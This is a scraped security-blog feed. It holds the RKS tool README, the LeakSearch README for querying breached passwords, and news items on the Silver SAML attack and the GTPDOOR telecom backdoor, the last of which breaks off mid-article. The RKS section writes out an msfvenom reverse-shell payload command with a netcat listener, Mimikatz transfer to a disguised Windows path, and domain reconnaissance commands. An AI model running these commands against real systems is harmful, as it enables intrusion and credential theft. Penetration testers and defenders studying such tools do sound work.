<ul> <li><a href="https://ghst.ly/BHSlack" rel="nofollow" target="_blank" title="BloodHound Slack">BloodHound Slack</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki" rel="nofollow" target="_blank" title="Wiki">Wiki</a></li> <li><a href="https://github.com/SpecterOps/CONTRIBUTORS.md" rel="nofollow" target="_blank" title="Contributors">Contributors</a></li> <li><a href="https://github.com/SpecterOps/examples/docker-compose/README.md" rel="nofollow" target="_blank" title="Docker Compose Example">Docker Compose Example</a></li> <li><a href="https://support.bloodhoundenterprise.io/" rel="nofollow" target="_blank" title="BloodHound Docs">BloodHound Docs</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki/Development" rel="nofollow" target="_blank" title="Developer Quick Start Guide">Developer Quick Start Guide</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki/Contributing" rel="nofollow" target="_blank" title="Contributing Guide">Contributing Guide</a></li> </ul> <br/><span style="font-size: large;"><b>Contact</b></span><br/> <p>Please check out the <a href="https://github.com/SpecterOps/BloodHound/wiki/Contact" rel="nofollow" target="_blank" title="Contact page">Contact page</a> in our wiki for details on how to reach out with questions and suggestions.</p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/SpecterOps/BloodHound" rel="nofollow" target="_blank" title="Download BloodHound">Download BloodHound</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/bloodhound-six-degrees-of-domain-admin.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-81084193961189104472024-03-05T09:12:00.001-08:002024-03-05T09:12:05.771-08:00RKS - A Script To Automate Keystrokes Through A Graphical Desktop Program<div class="post-body entry-content" id="post-body-7130412277071592003" itemprop="articleBody"> <div style="margin:15px"> </div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XDiXypTK-P_SJe6-IPlWn0NhMiHd3yskhfaVmlqOdirJRN54QZsmCsTXhRFK586TVOBTldBPZXoAsN5JKsnzvWalJT8meCNIRa8IlwhYjMR9HbicCtfYthEcraze2KNpzgDZMcCPeBuKcx-3WSXTQK2VMxHQtOKSp4O8sndz8hsFKH5lyXku-C5YePKU/s1271/RKS.png" imageanchor="1" rel="nofollow" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="691" data-original-width="1271" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XDiXypTK-P_SJe6-IPlWn0NhMiHd3yskhfaVmlqOdirJRN54QZsmCsTXhRFK586TVOBTldBPZXoAsN5JKsnzvWalJT8meCNIRa8IlwhYjMR9HbicCtfYthEcraze2KNpzgDZMcCPeBuKcx-3WSXTQK2VMxHQtOKSp4O8sndz8hsFKH5lyXku-C5YePKU/w640-h348/RKS.png" width="640"/></a></div><p><br/></p> <p>A script to automate keystrokes through an active <a href="https://www.kitploit.com/search/label/Remote%20Desktop" rel="nofollow" target="_blank" title="remote desktop">remote desktop</a> session that assists offensive operators in combination with <a href="https://www.kitploit.com/search/label/Living%20Off%20The%20Land" rel="nofollow" target="_blank" title="living off the land">living off the land</a> techniques.</p> <br/><span style="font-size: large;"><b>About RKS (RemoteKeyStrokes)</b></span><br/> <p>All credits goes to <a href="https://github.com/nopernik" rel="nofollow" target="_blank" title="nopernik">nopernik</a> for making it possible so I took it upon myself to improve it. I wanted something that helps during the <a href="https://www.kitploit.com/search/label/Post%20Exploitation" rel="nofollow" target="_blank" title="post exploitation">post exploitation</a> phase when executing commands through a remote desktop.</p> <span><a name='more'></a></span><div><br/></div><span style="font-size: large;"><b>Help Menu</b></span><br/> <pre><code>$ ./rks.sh -hUsage: ./rks.sh (RemoteKeyStrokes)Options: -c, --command <command | cmdfile> Specify a command or a file containing to execute -i, --input <input_file> Specify the local input file to transfer -o, --output <output_file> Specify the remote output file to transfer -m, --method <method> Specify the file transfer or execution method (For file transfer "base64" is set by default if not specified. For execution method "none" is set by default if not specified) -p, --platform <operating_system> Specify the operating system (windows is set by default if not specified) -w, --windowname <name> Specify t he window name for graphical remote program (freerdp is set by default if not specified) -h, --help Display this help message</code></pre> <br/><span style="font-size: large;"><b>Usage</b></span><br/> <br/><b>Internal Reconnaissance</b><br/> <ul> <li>When running in command prompt</li> </ul> <pre><code>$ cat recon_cmds.txtwhoami /allnet usernet localgroup Administratorsnet user /domainnet group "Domain Admins" /domainnet group "Enterprise Admins" /domainnet group "Domain Computers" /domain$ ./rks.h -c recon_cmds.txt</code></pre> <br/><b>Execute Implant</b><br/> <ul> <li>Execute an implant while reading the contents of the payload in powershell.</li> </ul> <pre><code>$ msfvenom -p windowx/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1$ ./rks.sh -c implant.ps1$ nc -lvnp 4444</code></pre> <br/><b>File Transfer</b><br/> <ul> <li>Transfer a file remotely when pivoting in a isolated network. If you want to specify the remote path on windows be sure to include quotes.</li> </ul> <pre><code>$ ./rks.sh -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1$ ./rks.sh -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64</code></pre> <br/><b>Specify Grapical Remote Software</b><br/> <ul> <li>If you're targeting VNC network protocols you can specify the window name with <code>tightvnc</code>.</li> </ul> <p><code>$ ./rks.sh -i implant.ps1 -w tightvnc</code></p> <ul> <li>If you're targeting legacy operating systems with older RDP <a href="https://www.kitploit.com/search/label/Authentication" rel="nofollow" target="_blank" title="authentication">authentication</a> specify the window name with <code>rdesktop</code>.</li> </ul> <p><code>$ ./rks.sh -i implant.bat -w rdesktop</code></p> <br/><span style="font-size: large;"><b>TODO and Help Wanted</b></span><br/> <ul> <li> <p>Add text colors for better user experience</p> </li> <li> <p>Implement Base64 file transfer</p> </li> <li> <p>Implement Bin2Hex file transfer</p> </li> <li> <p>Implement a persistence function for both windows and linux.</p> </li> <li> <p>Implement <a href="https://www.kitploit.com/search/label/Antiforensics" rel="nofollow" target="_blank" title="antiforensics">antiforensics</a> function for both windows and linux.</p> </li> <li> <p>Implement to read shellcode input and run C# implant and powershell runspace</p> </li> <li> <p>Implement privesc function for both windows and linux</p> </li> </ul> <br/><span style="font-size: large;"><b>References</b></span><br/> <ul> <li> <p><a href="https://www.youtube.com/watch?v=8YFEujJUxws" rel="nofollow" target="_blank" title="Video: sethc.exe Backdoor CMD Payload delivery (USB Rubber Ducky style)">Video: sethc.exe Backdoor CMD Payload delivery (USB Rubber Ducky style)</a></p> </li> <li> <p><a href="https://github.com/nopernik/mytools/blob/master/rdp-cmd-delivery.sh" rel="nofollow" target="_blank" title="Original Script">Original Script</a></p> </li> <li> <p><a href="https://github.com/ztgrace/sticky_keys_hunter" rel="nofollow" target="_blank" title="sticky_keys_hunter">sticky_keys_hunter</a></p> </li> </ul> <br/><span style="font-size: large;"><b>Credits</b></span><br/> <ul> <li><a href="https://github.com/nopernik" rel="nofollow" target="_blank" title="nopernik">nopernik</a></li> </ul><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/U53RW4R3/RKS" rel="nofollow" target="_blank" title="Download RKS">Download RKS</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/rks-script-to-automate-keystrokes.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-82373026327858898802024-02-29T16:49:00.001-08:002024-02-29T16:49:17.670-08:00LeakSearch - Search & Parse Password Leaks<div class="post-body entry-content" id="post-body-5752100906801092914" itemprop="articleBody"> <div style="margin:15px"> </div> <p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgalFuqSTMVub-Sx0tu5NnujnSSIjVp_zOdv97hjJdympwu7RU0SdvZAKWOtUfhEGyN-PixHDck0O78q2udqUlqYIr5Vbo6vadwj0JG5GFRaxy9a4HltYVFKjXqrpWZwerTC7vKCkST6q_j1ag7BQOwyykSTvswSIVnKN0wG7j6mwhGhE6xK2z6FDijFZMP" rel="nofollow"><img alt="" border="0" height="404" id="BLOGGER_PHOTO_ID_7337931135416379826" src="https://blogger.googleusercontent.com/img/a/AVvXsEgalFuqSTMVub-Sx0tu5NnujnSSIjVp_zOdv97hjJdympwu7RU0SdvZAKWOtUfhEGyN-PixHDck0O78q2udqUlqYIr5Vbo6vadwj0JG5GFRaxy9a4HltYVFKjXqrpWZwerTC7vKCkST6q_j1ag7BQOwyykSTvswSIVnKN0wG7j6mwhGhE6xK2z6FDijFZMP=w640-h404" width="640"/></a></p> <br/> <p><strong>LeakSearch</strong> is a simple tool to search and parse plain text <a href="https://www.kitploit.com/search/label/Passwords" rel="nofollow" target="_blank" title="passwords">passwords</a> using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password. </p> <p>In addition, you can define how many results you want to display on the terminal and export them as <a href="https://www.kitploit.com/search/label/JSON" rel="nofollow" target="_blank" title="JSON">JSON</a> or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.</p> <span><a name='more'></a></span><div><br/></div><span style="font-size: x-large;"><b>Requirements</b></span><br/> <ul> <li>Python 3 </li> <li>Install requirements</li> </ul> <br/><span style="font-size: x-large;"><b>Download</b></span><br/> <p>It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:</p> <pre><code>git clone https://github.com/JoelGMSec/LeakSearch</code></pre> <br/><span style="font-size: x-large;"><b>Usage</b></span><br/> <pre><code> _ _ ____ _ | | ___ __ _| | __/ ___| ___ __ _ _ __ ___| |__ | | / _ \/ _` | |/ /\___ \ / _ \/ _` | '__/ __| '_ \ | |__| __/ (_| | < ___) | __/ (_| | | | (__| | | | |_____\___|\__,_|_|\_\|____/ \___|\__,_|_| \___|_| |_| ------------------- by @JoelGMSec -------------------usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]options: -h, --help show this help message and exit -d DATABASE, --database DATABASE Database used for the search (ProxyNova or LocalDataBase) -k KEYWORD, --keyword KEYWORD Keyword (user/domain/pass) to search for leaks in the DB -n NUMBER, --number NUMBER Number of results to show (default is 20) -o OUTPUT, --output OUTPUT Save the results as json or txt into a file -p PROXY, --proxy PROXY Set HTTP/S proxy (like http://localhost:8080)</code></pre> <br/><span style="font-size: large;"><b>The detailed guide of use can be found at the following link:</b></span><br/> <p>https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch</p> <br/><span style="font-size: x-large;"><b>License</b></span><br/> <p>This project is licensed under the <a href="https://www.kitploit.com/search/label/GNU" rel="nofollow" target="_blank" title="GNU">GNU</a> 3.0 license - see the LICENSE file for more details.</p> <br/><span style="font-size: x-large;"><b>Credits and Acknowledgments</b></span><br/> <p>This tool has been created and designed from scratch by Joel Gámez Molina (@JoelGMSec).</p> <br/><span style="font-size: x-large;"><b>Contact</b></span><br/> <p>This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.</p> <p>For more information, you can find me on <a href="https://www.kitploit.com/search/label/Twitter" rel="nofollow" target="_blank" title="Twitter">Twitter</a> as <a href="https://twitter.com/JoelGMSec" rel="nofollow" target="_blank" title="@JoelGMSec">@JoelGMSec</a> and on my blog <a href="https://darkbyte.net" rel="nofollow" target="_blank" title="darkbyte.net">darkbyte.net</a>.</p> <br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/JoelGMSec/LeakSearch" rel="nofollow" target="_blank" title="Download LeakSearch">Download LeakSearch</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/02/leaksearch-search-parse-password-leaks.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-40891109690046830192024-02-29T08:25:00.001-08:002024-02-29T08:25:22.212-08:00New Silver SAML Attack Evades Golden SAML Defenses In Identity Systems<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSZXHmAGVzbLiZO_GSByhDWl8Ku3OC23_yNsD0iN6C78bvKM0K_m3bjwPNOFZwmg0INvyYU5leMKUK1kYqeNkwPoiAI4YB16FeYlasLhtvD60m9gUecKLcnsKPh4678dqojbj6ZAH3xiU/s1600/h79.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSZXHmAGVzbLiZO_GSByhDWl8Ku3OC23_yNsD0iN6C78bvKM0K_m3bjwPNOFZwmg0INvyYU5leMKUK1kYqeNkwPoiAI4YB16FeYlasLhtvD60m9gUecKLcnsKPh4678dqojbj6ZAH3xiU/s1600/h79.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3_6sv5NpzuZbAcWf78ZEfAMC5xtLD2_skoPU3hluY7oPp6fi0IqgZHMHUdLwQBE5d4E6Ib_tBfzikaR1lLkjjm7KScRsahF0S3BsjC-TI4lJ0VxdW6WSk_0PAg0dfBMz1vl1vyF5ZrShqZBmyEUdCCrmIMkJKBebQu3MibEkJzgGSrqdDCJgMGQyQGFDr/s728-rw-e365/ms.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Silver SAML Attack" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3_6sv5NpzuZbAcWf78ZEfAMC5xtLD2_skoPU3hluY7oPp6fi0IqgZHMHUdLwQBE5d4E6Ib_tBfzikaR1lLkjjm7KScRsahF0S3BsjC-TI4lJ0VxdW6WSk_0PAg0dfBMz1vl1vyF5ZrShqZBmyEUdCCrmIMkJKBebQu3MibEkJzgGSrqdDCJgMGQyQGFDr/s728-rw-e365/ms.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Silver SAML Attack"/></a></div> <p>Cybersecurity researchers have disclosed a new attack technique called <strong>Silver SAML</strong> that can be successful even in cases where mitigations have been applied against Golden SAML attacks.</p><a name='more'></a> <p>Silver SAML "enables the exploitation of SAML to launch attacks from an identity provider like Entra ID against applications configured to use it for authentication, such as Salesforce," Semperis researchers Tomer Nahum and Eric Woodruff <a href="https://www.semperis.com/blog/meet-silver-saml" rel="nofollow" target="_blank">said</a> in a report shared with The Hacker News.</p> <p>Golden SAML (short for <a href="https://www.cloudflare.com/learning/access-management/what-is-saml/" rel="nofollow" target="_blank">Security Assertion Markup Language</a>) was <a href="https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps" rel="nofollow" target="_blank">first documented</a> by CyberArk in 2017. The attack vector, in a nutshell, entails the abuse of the interoperable authentication standard to impersonate almost any identity in an organization.</p> <p>It's also similar to the <a href="https://www.crowdstrike.com/cybersecurity-101/golden-ticket-attack/" rel="nofollow" target="_blank">Golden Ticket attack</a> in that it grants attackers the ability to gain unauthorized access to any service in a federation with any privileges and to stay persistent in this environment in a stealthy manner.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/freedom728" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUBKmQc1Mp9Be8o9pORH2koyv6AtOY3W6jgTh0TYLjlGfcGRPK3vlKwxQ88api-M6whsx6aLYlhAqdIZlbfG2-AnERTe5zlTwSYNSFOtzUf7t8PtnQ3tJ6wmv4QYZ1igZHb7b3AFkJEkQeNOASR7Q9JjzaivqAWpIbTFUCd6zuseItXCikh71SnSX50xXs/s728-rw-e365/freedom728.jpg" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>"Golden SAML introduces to a federation the advantages that golden ticket offers in a Kerberos environment – from gaining any type of access to stealthily maintaining persistency," security researcher Shaked Reiner noted at the time.</p> <p>Real-world attacks leveraging the method have been rare, the <a href="https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection" rel="nofollow" target="_blank">first</a> <a href="https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/" rel="nofollow" target="_blank">recorded use</a> being the <a href="https://www.microsoft.com/en-us/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/" rel="nofollow" target="_blank">compromise</a> of <a href="https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095" rel="nofollow" target="_blank">SolarWinds</a> <a href="https://msrc.microsoft.com/blog/2020/12/customer-guidance-on-recent-nation-state-cyber-attacks/" rel="nofollow" target="_blank">infrastructure</a> to gain administrative access by forging SAML tokens using compromised SAML token signing certificates.</p> <p>Golden SAML has also been weaponized by an Iranian threat actor codenamed <a href="https://thehackernews.com/2023/09/iranian-nation-state-actors-employ.html" rel="nofollow" target="_blank">Peach Sandstorm</a> in a March 2023 intrusion to access an unnamed target's cloud resources sans requiring any password, Microsoft revealed in September 2023.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEw23CuuLPQhxppcT8caizSHnHXuvyUfmqOEmBt8FOcwPbAer1BktvE5JXhSxlp7_gqtdprHfil55s2igTA9pFElJ_lDMVvhioSTkczUb6u0jY-j_qx9UeWk7vlNG3nyu4Kb5Z8_2T8LeD7-JJ3fZfN2KrcODfWSzqIWj6yhD5zRhDqTMzg6S6WQTVIg4c/s728-rw-e365/http.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Silver SAML Attack" border="0" data-original-height="902" data-original-width="1536" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEw23CuuLPQhxppcT8caizSHnHXuvyUfmqOEmBt8FOcwPbAer1BktvE5JXhSxlp7_gqtdprHfil55s2igTA9pFElJ_lDMVvhioSTkczUb6u0jY-j_qx9UeWk7vlNG3nyu4Kb5Z8_2T8LeD7-JJ3fZfN2KrcODfWSzqIWj6yhD5zRhDqTMzg6S6WQTVIg4c/s728-rw-e365/http.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Silver SAML Attack"/></a></div> <p>The latest approach is a spin on Golden SAML that works with an identity provider (IdP) like Microsoft Entra ID (formerly Azure Active Directory) and doesn't require access to the Active Directory Federation Services (<a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview" rel="nofollow" target="_blank">AD FS</a>). It has been assessed as a moderate-severity threat to organizations.</p> <p>"Within Entra ID, Microsoft provides a self-signed certificate for SAML response signing," the researchers said. "Alternatively, organizations can choose to use an externally generated certificate such as those from Okta. However, that option introduces a security risk."</p> <p>"Any attacker that obtains the private key of an externally generated certificate can forge any SAML response they want and sign that response with the same private key that Entra ID holds. With this type of forged SAML response, the attacker can then access the application — as any user."</p> <p>Following responsible disclosure to Microsoft on January 2, 2024, the company said the issue does not meet its bar for immediate servicing, but noted it will take appropriate action as needed to safeguard customers.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/tcepdHrZ" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVhi7qr5Hen_9AjDa2uZMIW8b9hxydG5MpgkcamW6lADBts-QzcbwiMscCUSJ5ScLmTIt97I9Y7L3kFbXLlkt40DwhkyCLl3QrLwjViEZrbgNuTHnIjYcFmf8OHFIdfXzIxCoCJYxj8rokzFuM9fAuUhoKus7KPsedxq4k7CY9_-iZ3dtVRdB1DtqvdRIf/s728-rw-e365/cis-728.png" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>While there is no evidence that Silver SAML has been exploited in the wild, organizations are required to use only Entra ID self-signed certificates for SAML signing purposes. Semperis has also made available a proof-of-concept (PoC) dubbed <a href="https://github.com/Semperis/SilverSamlForger" rel="nofollow" target="_blank">SilverSAMLForger</a> to create custom SAML responses.</p> <p>"Organizations can monitor Entra ID audit logs for changes to PreferredTokenSigningKeyThumbprint under ApplicationManagement," the researchers said.</p> <p>"You will need to correlate those events to Add service principal credential events that relate to the service principal. The rotation of expired certificates is a common process, so you will need to determine whether the audit events are legitimate. Implementing change control processes to document the rotation can help to minimize confusion during rotation events."</p> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/new-silver-saml-attack-evades-golden.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-8832559710186490782024-02-29T04:19:00.001-08:002024-02-29T04:19:40.719-08:00GTPDOOR Linux Malware Targets Telecoms, Exploiting GPRS Roaming Networks<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxTcstZ3eEXyhwh9wRQrwbiEGeU63Wo6SP50lMzKOz2U1A-iPfBOL9sDEDPoziL-2KnJHTN9G8Q7bFU4nZhuRmmrt7YAxPe5QD874jfZhhmXSi1fg3Fx1bPlU66vARjyGhXn6RUUIrAb4/s1600/h118.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxTcstZ3eEXyhwh9wRQrwbiEGeU63Wo6SP50lMzKOz2U1A-iPfBOL9sDEDPoziL-2KnJHTN9G8Q7bFU4nZhuRmmrt7YAxPe5QD874jfZhhmXSi1fg3Fx1bPlU66vARjyGhXn6RUUIrAb4/s1600/h118.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ZCZvSbOtGh_UAiA2QCc7XXmNM_EPYN0XjG79ufcTcfp1z5o0Rs4fFpU-OvJwKfxxG45Zox_vw36AXqBZwOAonmZFLNhHZqIbsez9XS4TNGgfr1iN943UTybupWK2bhHerleeHMe6Kknzy9DVBLDUCEG-jN2SeNYYTrMbjGDz9lSB76zOUH9cDZP6Y5vz/s728-rw-e365/telecom.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="GTPDOOR Linux Malware" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ZCZvSbOtGh_UAiA2QCc7XXmNM_EPYN0XjG79ufcTcfp1z5o0Rs4fFpU-OvJwKfxxG45Zox_vw36AXqBZwOAonmZFLNhHZqIbsez9XS4TNGgfr1iN943UTybupWK2bhHerleeHMe6Kknzy9DVBLDUCEG-jN2SeNYYTrMbjGDz9lSB76zOUH9cDZP6Y5vz/s728-rw-e365/telecom.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="GTPDOOR Linux Malware"/></a></div> <p>Threat hunters have discovered a new Linux malware called <strong>GTPDOOR</strong> that's designed to be deployed in telecom networks that are adjacent to GPRS roaming exchanges (<a href="https://en.wikipedia.org/wiki/GPRS_roaming_exchange" rel="nofollow" target="_blank">GRX</a>)</p><a name='more'></a> <p>The <a href="https://doubleagent.net/telecommunications/backdoor/gtp/2024/02/27/GTPDOOR-COVERT-TELCO-BACKDOOR" rel="nofollow" target="_blank">malware</a> is novel in the fact that it leverages the GPRS Tunnelling Protocol (<a href="https://en.wikipedia.org/wiki/GPRS_Tunnelling_Protocol" rel="nofollow" target="_blank">GTP</a>) for command-and-control (C2) communications.</p> <p>GPRS roaming allows subscribers to access their GPRS services while they are beyond the reach of their home mobile network. This is facilitated by means of a GRX that transports the roaming traffic using GTP between the visited and the home Public Land Mobile Network (<a href="https://en.wikipedia.org/wiki/Public_land_mobile_network" rel="nofollow" target="_blank">PLMN</a>).</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/delinea728" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFl0XFULXGgKLO8peSzZVqzrRFLL1K51a-m-G6uIJ_5KYJF3VkmlD8kLYYJbfF9RDGmWvinkoGe_YUnOdYnQoIe-rq2bEJ7Gcm7UjAHe3AsXed7FIGQcL6ecVaPInWYtwYQpmod0QvcVtoXiPtzDLzwVlBCSjBTOcP_4ZdpH-ExGJTcUGzTwR8BvCuBoD/s728-rw-e365/delinea728.jpg" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>Security researcher haxrob, who discovered two <a href="https://www.virustotal.com/gui/file/827f41fc1a6f8a4c8a8575b3e2349aeaba0dfc2c9390ef1cceeef1bb85c34161" rel="nofollow" target="_blank">GTPDOOR</a> <a href="https://www.virustotal.com/gui/file/5cbafa2d562be0f5fa690f8d551cdb0bee9fc299959b749b99d44ae3fda782e4" rel="nofollow" target="_blank">artifacts</a> uploaded to VirusTotal from China and Italy, said the backdoor is likely linked to a known threat actor tracked as <a href="https://thehackernews.com/2021/10/lightbasin-hackers-breach-at-least-13.html" rel="nofollow" target="_blank">LightBasin</a> (aka UNC1945), which was previously disclosed by CrowdStrike in October 2021 in connection with a series of attacks targeting the telecom sector to steal subscriber information and call metadata.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnJHK7M9RFkyFZJrr4AS3E7JpzBHud-jShW9NLdLY01O2s8jtbxtIoeUTfWsxfROsGPwoLXD3c1yd7x6fDxvWVnBXmaunB642-mn9lpk8IXtunDmve9BnaH0IzmTC_DWCVHHGbq8Un8MzriZ_8qQq4WAn7ww44zcGOXuokw0GPPxPy1dX15CBH7VjVFDm9/s728-rw-e365/linux.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="GTPDOOR Linux Malware" border="0" data-original-height="253" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnJHK7M9RFkyFZJrr4AS3E7JpzBHud-jShW9NLdLY01O2s8jtbxtIoeUTfWsxfROsGPwoLXD3c1yd7x6fDxvWVnBXmaunB642-mn9lpk8IXtunDmve9BnaH0IzmTC_DWCVHHGbq8Un8MzriZ_8qQq4WAn7ww44zcGOXuokw0GPPxPy1dX15CBH7VjVFDm9/s728-rw-e365/linux.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="GTPDOOR Linux Malware"/></a></div> <p>"When run, the first thing GTPDOOR does is process-name stomps itself – changing its process name to '[syslog]' – disguised as syslog invoked from the kernel," the researcher said. "It suppresses child signals and then opens a raw socket [that] will allow the implant to receive UDP messages that hit the network interfaces."</p> <p>Put differently, GTPDOOR allows a threat actor that already has established persistence on the roaming exchange network to contact a compromised host by sending GTP-C Echo Request messages with a malicious payload.</p> <p>This magic GTP-C Echo Request message acts as a conduit to transmit a command to be executed on the infected machine and return the results back to the remote host.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/tcepdHrZ" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVhi7qr5Hen_9AjDa2uZMIW8b9hxydG5MpgkcamW6lADBts-QzcbwiMscCUSJ5ScLmTIt97I9Y7L3kFbXLlkt40DwhkyCLl3QrLwjViEZrbgNuTHnIjYcFmf8OHFIdfXzIxCoCJYxj8rokzFuM9fAuUhoKus7KPsedxq4k7CY9_-iZ3dtVRdB1DtqvdRIf/s728-rw-e365/cis-728.png" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>GTPDOOR "Can be covertly probed from an external network to elicit a response by sending a TCP packet to any port number," the researcher noted. "If the implant is active a crafted empty TCP packet is returned along with information if the destination port was open/responding on the host."</p> <p>"This implant looks like it is designed to sit on compromised hosts that directly touch the GRX network – these are the systems that communicate to other telecommunication operator networks via the GRX."</p> <div count="4" 